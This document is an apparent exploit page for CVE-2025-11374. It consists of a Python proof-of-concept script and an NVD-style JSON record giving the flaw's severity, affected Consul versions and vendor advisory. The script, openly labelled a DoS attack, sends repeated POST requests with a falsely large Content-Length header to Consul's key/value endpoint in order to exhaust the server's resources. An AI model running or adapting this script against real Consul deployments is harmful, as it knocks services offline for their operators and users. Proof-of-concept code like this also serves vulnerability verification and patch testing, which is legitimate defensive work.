CVE-2025-11374

import requests import sys import time def exploit_consul_dos(target_url, count=10): """ PoC for CVE-2025-11374: Consul KV endpoint DoS via incorrect Content-Length validation This PoC demonstrates the vulnerability by sending requests with mismatched Content-Length headers to exhaust server resources. Args: target_url: Base URL of Consul API (e.g., 'http://target:8500') count: Number of malicious requests to send """ headers = { 'Content-Type': 'application/json', # Intentionally incorrect Content-Length to trigger vulnerability 'Content-Length': '99999' } payload = '{"test": "data"}' # Actual body is much smaller than declared Content-Length print(f'[*] Starting DoS attack on {target_url}') print(f'[*] Sending {count} malformed requests...') for i in range(count): try: response = requests.post( f'{target_url}/v1/kv/test', headers=headers, data=payload, timeout=30 ) print(f'[+] Request {i+1}/{count} sent') except requests.exceptions.RequestException as e: print(f'[-] Request {i+1}/{count} failed: {e}') time.sleep(0.5) print('[*] Attack completed') print('[*] Check Consul service availability') if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: python {sys.argv[0]} <target_url>') print('Example: python {sys.argv[0]} http://localhost:8500') sys.exit(1) exploit_consul_dos(sys.argv[1])

{"cve": {"id": "CVE-2025-11374", "sourceIdentifier": "[email protected]", "published": "2025-10-28T21:15:37.300", "lastModified": "2025-12-22T16:05:52.177", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Consul and Consul Enterprise’s (“Consul”) key/value endpoint is vulnerable to denial of service (DoS) due to incorrect Content Length header validation. This vulnerability, CVE-2025-11374, is fixed in Consul Community Edition 1.22.0 and Consul Enterprise 1.22.0, 1.21.6, 1.20.8 and 1.18.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionEndExcluding": "1.18.12", "matchCriteriaId": "DE3AEC9A-D84F-4B7C-9B03-D3B8CE2CD319"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:*", "versionEndExcluding": "1.22.0", "matchCriteriaId": "BD19A817-7366-4C2E-ADF9-35DC889EFE58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "1.19.0", "versionEndExcluding": "1.20.8", "matchCriteriaId": "596686CD-4DE0-4C9A-83CC-F07B0D2014DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "1.21.0", "versionEndExcluding": "1.21.6", "matchCriteriaId": "8B688D66-7E0A-4969-9187-D5374EDF68B9"}]}]}], "references": [{"url": "https://discuss.hashicorp.com/t/hcsec-2025-29-consuls-kv-endpoint-is-vulnerable-to-denial-of-service/76724", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}